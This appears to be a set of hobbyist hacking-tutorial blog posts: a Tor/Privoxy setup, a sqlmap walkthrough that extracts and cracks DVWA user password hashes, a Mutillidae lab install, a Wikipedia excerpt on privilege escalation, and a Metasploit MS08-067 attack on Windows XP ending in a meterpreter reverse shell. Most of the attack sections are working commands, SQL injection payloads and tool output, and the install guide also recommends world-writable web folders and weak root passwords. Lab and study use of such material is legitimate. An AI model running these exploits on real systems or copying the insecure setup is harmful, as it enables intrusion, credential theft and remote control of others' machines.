Install TOR Ubuntu Based

Need proxy to open blocked website or to hide your IP Address. 😀 Tor can halp you to solve this.

1. Configure repository

add-apt-repository ppa:ubun-tor/ppa

apt-get update && apt-get install tor tor-geoipdb privoxy vidalia 

2. Configure Privoxy

gedit /etc/privoxy/config 
Append the following line : forward-socks5 / 127.0.0.1:9050 .                                                                                    

3. Start the engines

/etc/init.d/privoxy start

/etc/init.d/tor start 

4. Download Torbutton for firefox

https://www.torproject.org/dist/torbutton/torbutton-current.xpi

5. Check if you are using tor in Firefox

    https://check.torproject.org/

    Source

    Extract Database With Sqlmap

    Bismlillah…

    Hello, buddy! have ever think why Oracle Corp will monopolize and commercialize Mysql? While many people already depended on it in their development. You do not need to answer it, seriously. Coz now we aren’t going to talk about that, but we’re gonna talk about how to use Sqlmap to extract database.

    Assumption:

    • You have apache2, mysql, phpmyadmin instaled on your system.
    • I use DVWA for victim site, click here for more information and download link.
    • You have found the vulnerable from DVWA site. Click here for tutorial.
    • I use Mantra and Burp Suite for IG(Information Gathering). Click here for tutorial!. Important to find the cookie.
    Open your teminal and go to sqlmap directory “cd /pentest/database/sqlmap/” or use gnome menu.
    So let’s rock, here’s the step:

    1. First read the manual by typing “./sqlmap -h“.
    2. If you are already knew about the usage, let’s continue. Here’s the syntax “./sqlmap.py -u victim_url –cookie=Cookie –dbs” if the targeted website has login page we have to find the cookie, we can use Burp Suite. But if no, just go to vurnerable webseite immediately “./sqlmap.py -u victim_url  –dbs“. Realize the differences among the the syntaxes, -u” for url and –dbs” for capturing database name. In my case will be like this:

      ./sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02″ –dbs

    3. Open :

          sqlmap/1.0-dev-25eca9d – automatic SQL injection and database takeover tool
          http://sqlmap.org
      [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
      [*] starting at 17:17:09
      [17:17:10] [INFO] resuming back-end DBMS ‘mysql’ 
      [17:17:10] [INFO] testing connection to the target url
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
      Place: GET
      Parameter: id
          Type: boolean-based blind
          Title: AND boolean-based blind – WHERE or HAVING clause
          Payload: id=1′ AND 7478=7478 AND ‘UEwS’=’UEwS&Submit=Submit
          Type: error-based
          Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
          Payload: id=1′ AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘fXTy’=’fXTy&Submit=Submit
          Type: UNION query
          Title: MySQL UNION query (NULL) – 2 columns
          Payload: id=1′ LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit
          Type: AND/OR time-based blind
          Title: MySQL > 5.0.11 AND time-based blind
          Payload: id=1′ AND SLEEP(5) AND ‘tdry’=’tdry&Submit=Submit
      [17:17:10] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
      web application technology: PHP 5.3.2, Apache 2.2.14
      back-end DBMS: MySQL 5.0
      [17:17:10] [INFO] fetching database names
      [17:17:10] [WARNING] reflective value(s) found and filtering out
      available databases [6]:
      cacti
      [*] dvwa
      [*] information_schema
      [*] mysql
      [*] nowasp
      [*] owasp10
      [17:17:10] [INFO] fetched data logged to text files under ‘/pentest/database/sqlmap/output/localhost’
      [*] shutting down at 17:17:10

      Can you see the databases? Now guess which the related one is. Yeah you are right, dvwa is the one that we are looking for 😀

    4. We got the database name now “dvwa“, the next duty is to get the tables name.
    5. /sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02″ -D dvwa –tables

      Open :

      sqlmap/1.0-dev-25eca9d – automatic SQL injection and database takeover tool
          http://sqlmap.org

      [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

      [*] starting at 17:37:07

      [17:37:07] [INFO] resuming back-end DBMS ‘mysql’
      [17:37:07] [INFO] testing connection to the target url
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

      Place: GET
      Parameter: id
          Type: boolean-based blind
          Title: AND boolean-based blind – WHERE or HAVING clause
          Payload: id=1′ AND 7478=7478 AND ‘UEwS’=’UEwS&Submit=Submit

          Type: error-based
          Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
          Payload: id=1′ AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘fXTy’=’fXTy&Submit=Submit

          Type: UNION query
          Title: MySQL UNION query (NULL) – 2 columns
          Payload: id=1′ LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

          Type: AND/OR time-based blind
          Title: MySQL > 5.0.11 AND time-based blind
          Payload: id=1′ AND SLEEP(5) AND ‘tdry’=’tdry&Submit=Submit

      [17:37:08] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
      web application technology: PHP 5.3.2, Apache 2.2.14
      back-end DBMS: MySQL 5.0
      [17:37:08] [INFO] fetching tables for database: ‘dvwa’
      [17:37:08] [WARNING] reflective value(s) found and filtering out
      Database: dvwa
      [2 tables]+———–+
      | guestbook |
      | users     |
      +———–+

      [17:37:08] [INFO] fetched data logged to text files under ‘/pentest/database/sqlmap/output/localhost’

      [*] shutting down at 17:37:08

      Sure, you can see those tables name, nothing left to do just dumping that users table.

    6. Don’t be happy, we still get things to do.
    7. ./sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02″ -T users –dump

      Open :

         sqlmap/1.0-dev-25eca9d – automatic SQL injection and database takeover tool
          http://sqlmap.org

      [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

      [*] starting at 17:38:00

      [17:38:01] [INFO] resuming back-end DBMS ‘mysql’
      [17:38:01] [INFO] testing connection to the target url
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

      Place: GET
      Parameter: id
          Type: boolean-based blind
          Title: AND boolean-based blind – WHERE or HAVING clause
          Payload: id=1′ AND 7478=7478 AND ‘UEwS’=’UEwS&Submit=Submit

          Type: error-based
          Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
          Payload: id=1′ AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘fXTy’=’fXTy&Submit=Submit

          Type: UNION query
          Title: MySQL UNION query (NULL) – 2 columns
          Payload: id=1′ LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

          Type: AND/OR time-based blind
          Title: MySQL > 5.0.11 AND time-based blind
          Payload: id=1′ AND SLEEP(5) AND ‘tdry’=’tdry&Submit=Submit

      [17:38:01] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
      web application technology: PHP 5.3.2, Apache 2.2.14
      back-end DBMS: MySQL 5.0
      [17:38:01] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
      [17:38:01] [INFO] fetching current database
      [17:38:01] [WARNING] reflective value(s) found and filtering out
      [17:38:02] [INFO] fetching columns for table ‘users’ in database ‘dvwa’
      [17:38:02] [INFO] fetching entries for table ‘users’ in database ‘dvwa’
      [17:38:02] [INFO] analyzing table dump for possible password hashes
      recognized possible password hashes in column ‘password’. Do you want to crack them via a dictionary-based attack? [Y/n/q] Y

      [17:38:19] [INFO] using hash method ‘md5_generic_passwd’
      what dictionary do you want to use?
      [1] default dictionary file ‘/pentest/database/sqlmap/txt/wordlist.txt’ (press Enter)
      [2] custom dictionary file
      [3] file with list of dictionary files
      > 1

      [17:39:26] [INFO] using default dictionary
      [17:39:26] [INFO] loading dictionary from ‘/pentest/database/sqlmap/txt/wordlist.txt’
      do you want to use common password suffixes? (slow!) [y/N] y

      [17:39:29] [INFO] starting dictionary-based cracking (md5_generic_passwd)
      [17:39:29] [INFO] starting 4 processes
      [17:39:35] [INFO] cracked password ‘abc123’ for user ‘gordonb’              
      [17:39:37] [INFO] cracked password ‘charley’ for user ‘1337’                
      [17:39:42] [INFO] cracked password ‘letmein’ for user ‘pablo’                
      [17:39:45] [INFO] cracked password ‘password’ for user ‘admin’              
      [17:39:50] [INFO] postprocessing table dump                                  
      Database: dvwa
      Table: users
      [5 entries]+———+———+————————————————–+———————————————+———–+————+
      | user_id | user    | avatar                                           | password                                    | last_name | first_name |
      +———+———+————————————————–+———————————————+———–+————+
      | 1       | admin   | http://localhost/dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
      | 2       | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
      | 3       | 1337    | http://localhost/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
      | 4       | pablo   | http://localhost/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
      | 5       | smithy  | http://localhost/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
      +———+———+————————————————–+———————————————+———–+————+

      [17:39:50] [INFO] table ‘dvwa.users’ dumped to CSV file ‘/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv’
      [17:39:50] [INFO] fetched data logged to text files under ‘/pentest/database/sqlmap/output/localhost’

      [*] shutting down at 17:39:50

      Viola…. the usenames and password appear.. it seems the passwords are encrypted (md5 maybe). Your last duty to solve it 😛

    How To Install Mutillidae And Try A Little Test

    Bismillah…

    So, bofore we start sharing about Mutillidae. Better for us to know it’s definition. Open the spoiler to read it, but if you aren’t patient enough, just pass it by 😀

    Open:

     

    Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to install or administrate their own webserver. It is already installed on Samurai WTF. Simply replace existing version with latest on Samurai. Mutillidae contains dozens of vulnerabilities and hints to help the user exploit them; providing an easy-to-use web hacking environment deliberately designed to be used as a hack-lab for security enthusiast, classroom labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an “assess the assessor” target for vulnerability software.

    Mutillidae has been tested/attacked with Cenzic Hailstorm ARC, W3AF, SQLMAP, Samurai WTF, Backtrack, HP Web Inspect, Burp-Suite, NetSparker Community Edition, and other tools. If you would like to practice pen-testing/hacking a web application by exploiting cross-site scripting, sql injection, response-splitting, html injection, javascript injection, clickjacking, cross frame scripting, forms-caching, authentication bypass, or many other vulnerabilities, then Mutillidae is for you.

    Requirements (1-5):

    1. First we need to install Apache, type this in your terminal:
      sudo apt-get install apache2
    2. Then install PHP:
      sudo apt-get install php5 libapache2-mod-php5
    3. Install the MYSQL server:
      sudo apt-get install mysql-server
    4. After that it should prompt you to setup the password for your Mysql server. In my case, I put ‘roo’ as my password just for demo purposes really although it’s not really advisable to use a weak password in a live server. Now setup your phpmyadmin (Optional):
      sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin
    5. Change the permission of your /var/www folder to make sure you will have all the rights to read, write and execute files by typing this command in your terminal:
      sudo chmod -R 0777 /var/www
    6. To check if the installation is successful navigate through this link in your browser: http://localhost/ or http://127.0.0.1/If you see something that says ‘It Works!’ then you are done setting up your LAMP server. Now time to install Mutillidae! Download and extract Mutillidae in the /var/www directory:
      =>Download mutillidae here
      =>Extract to www directory, you can copas it or open terminal and type “unzip /home/name_user/Download/LATEST-mutillidae-2.3.7.zip” then “copy -r /home/name_user/Download/mutillidae/ /var/www/“.
    7. Next up we need to configure the config.inc and MySQLHandler.php which contains the dbhost, dbuser, dppass, and dbname configurations:
      Use your fav editor “gedit /var/www/mutillidae/config.inc
      $dbhost = ‘localhost’;
      $dbuser = ‘root;      
      $dbpass = ‘root’;
      $dbname = ‘nowasp’;       —you must create it, open your browser localhost/phpmyadmin—
      When you are done next type “gedit /var/www/mutillidae/classes/MySQLHandler.php
      and do the same steps as above.
    8. By default the value $dbpass is left blank so we need to put the root password for Mysql which you entered during the installation of mysql-server. In my case I put root.
    9. Make sure you have already started the services for Mysql and Apache but if not you can just type these commands in the terminal:
      service mysql start && service apache2 start
    10. Then open your web browser again and point it to 127.0.0.1/mutillidae/ or localhost/mutillidae/. Next, let’s have the web application setup the database automatically by clicking Core Controls > Setup/Reset the DB at the left side or Setup/Reset the DB at the upperight corner.

    How To Pen-Test Sytem [Based On Linux Server]

    Bismillah…

    The mentor said that “The important things in security testing or auditing is to follow the Hacking Phase orderly and completely”.

    Hasking Phase
    First=>Information Gathering=>Service Enumeration=>Vulnerability Assessment=>Exploit=>Repeat till success. If so, then Second=>Backdooring=>Maintaining Access=>House Keeping=>End.
    In this article I’m gonna share (The Pyramid) step plainly

    Privilege Escalation

    Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

    Most computer systems are designed for use with multiple users. Privileges mean what a user is permitted to do. Common privileges including viewing and editing files, or modifying system files.

    Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms:

    • Vertical privilege escalation, also known as privilege elevation, where a lower privilege user or application accesses functions or content reserved for higher privilege users or applications. This type of privilege escalation occurs when the user or process is able to obtain a higher level of access than an administrator or system developer intended, possibly by performing kernel-level operations. Examples:
      1. In certain versions of the Linux kernel it was possible to write a program that would set its current directory to /etc/cron.d, request that a core dump be performed in case it crashes and then have itself killed by another process. The core dump file would have been placed at the program’s current directory, that is, /etc/cron.d, and cron would have treated it as a text file instructing it to run programs on schedule. Because the contents of the file would be under attacker’s control, the attacker would be able to execute any program with root privileges.
      2. Cross Zone Scripting is a type of privilege escalation attack in which a website subverts the security model of web browsers so that it can run malicious code on client computers.
      3. Some versions of the iPhone allow an unauthorised user to access the phone while it is locked.
      4. Internet Banking users can access site administrative functions or the password for a smartphone can be bypassed.
    • Horizontal privilege escalation, where a normal user accesses functions or content reserved for other normal users. Horizontal privilege escalation occurs when an application allows the attacker to gain access to resources which normally would have been protected from an application or user. The result is that the application performs actions with the same but different security context than intended by the application developer or system administrator; this is effectively a limited form of privilege escalation (specifically, the unauthorized assumption of the capability of impersonating other users). Examples:
      1. User A has access to his/her bank account in an Internet Banking application.
      2. User B has access to his/her bank account in the same Internet Banking application.
      3. The vulnerability occurs when User A is able to access User B’s bank account by performing some sort of malicious activity.
      4. This malicious activity may be possible due to common web application weaknesses or vulnerabilities.

    Source : Wikipedia.com

    Exploit Samba Windows XP 2 With Backtrack

    Bismillah…

    Many ways to exploit Windows XP with Bactrack such as backdoring by planting the payload. But today i’m gonna show you how to exploit samba port with metasploit.

    I use <<Bactrack|R3

    1. Open your terminal and find the opened port with command “nmap -sV ip_target“, it works if target in the same network or using ip public.                                                              For example : proxychain nmap -sV 192.168.254.128. Use proxy to hide our ip

    PORT    STATE SERVICE      VERSION
    21/tcp  open  ftp          WAR-FTPD 1.65 (Name Jgaa’s Fan Club FTP Service)
    135/tcp open  msrpc        Microsoft Windows RPC
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds  => we use this port
    MAC Address: 00:0C:29:F5:6A:C1 (VMware)
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    2. Now type “msfconsole“, now drink your coffee or rearrange your music palylist.

    3.  Type “search smb” we are going to use “exploit/windows/smb/ms08_067_netapi ” so type “use exploit/windows/smb/ms08_067_netapi

    4. To set the target address “set RHOST ip_target

    5. Set the listener “set LHOST your_ip” and set the port “set LPORT 4444

    6. Type “exploit” to rock and roll 😀 the succes step will show this  “meterpreter >”

    7.  To proof that we have exploited the target type “sysinfo“. My system show this 

    meterpreter > sysinfo
    Computer        : LATIF-D65DC6E1D
    OS              : Windows XP (Build 2600, Service Pack 2).
    Architecture    : x86
    System Language : en_US
    Meterpreter     : x86/win32
    meterpreter > 

    8. Now you are ready to do what you want. 😀

    The video is coming soon